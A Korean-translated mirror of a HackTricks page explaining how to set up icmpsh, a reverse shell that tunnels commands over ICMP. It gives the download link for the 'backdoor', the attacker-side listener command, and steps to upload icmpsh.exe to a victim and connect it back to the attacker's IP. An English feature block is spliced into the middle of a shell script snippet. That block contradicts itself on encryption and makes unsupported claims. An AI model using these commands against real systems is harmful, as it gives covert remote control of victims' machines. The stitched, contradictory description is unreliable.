mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
4.3 KiB
4.3 KiB
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!
HackTricks를 지원하는 다른 방법:
- 회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!
- 공식 PEASS & HackTricks 스웨그를 얻으세요.
- The PEASS Family를 발견하세요. 독점적인 NFTs 컬렉션입니다.
- 💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
- Hacking 트릭을 공유하려면 HackTricks 및 HackTricks Cloud github 저장소에 PR을 제출하세요.
https://github.com/inquisb/icmpsh에서 백도어를 다운로드하세요.
클라이언트 측
스크립트를 실행하세요: run.sh
오류가 발생하면 다음 줄을 변경해보세요:
IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
ICMP Shell (icmpsh)
Description
ICMP Shell (icmpsh) is a simple reverse ICMP shell that uses ICMP echo requests to establish a command shell on a target machine. It is a part of the icmpsh project.
Features
- Stealthy communication: ICMP echo requests are commonly allowed through firewalls and are less likely to be detected.
- Reverse shell: Allows an attacker to execute commands on the target machine.
- Encrypted communication: ICMP payload is encrypted using AES-128-CBC.
- Cross-platform: Works on Windows, Linux, and macOS.
Usage
- Start the listener on the attacker machine:
icmpsh.exe -l -v -d
- Execute the client on the target machine:
icmpsh.exe -t <attacker_ip> -d
- Once the connection is established, the attacker can execute commands on the target machine.
Limitations
- Requires administrative privileges on the target machine.
- ICMP echo requests may be blocked by some firewalls or network configurations.
- The communication is not encrypted by default, but can be enabled using the
-e
option.
Detection
- Monitor network traffic for ICMP echo requests to identify potential ICMP shell activity.
- Use intrusion detection systems (IDS) or network monitoring tools to detect suspicious ICMP traffic.
- Regularly update firewall rules to block ICMP echo requests if not required.
References
echo Please insert the IP where you want to listen
read IP
피해자 측
피해자에게 icmpsh.exe를 업로드하고 실행하세요:
icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!
HackTricks를 지원하는 다른 방법:
- 회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!
- 공식 PEASS & HackTricks 스웨그를 얻으세요.
- The PEASS Family를 발견하세요. 독점적인 NFTs 컬렉션입니다.
- 💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
- Hacking 트릭을 공유하려면 HackTricks 및 HackTricks Cloud github 저장소에 PR을 제출하세요.